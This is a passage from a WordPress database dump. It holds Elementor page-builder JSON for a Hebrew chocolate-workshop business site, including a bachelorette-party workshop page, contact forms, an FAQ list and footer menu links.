invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1002,205,'_elementor_template_type','page'),(1003,205,'_elementor_edit_mode','builder'),(1004,205,'_wp_page_template','default'),(1005,205,'_elementor_data','[{\"id\":\"72271eb7\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"16fbf649\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"66e81b8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e020468\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"3ade1445\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"16f6135c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"593ee689\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7be6a268\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"55996b0f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12fce205\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6a89b19f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e38bfc8\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"6c5f9886\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"3dca36f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"620187ec\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"29da4212\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"bbfc993\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u0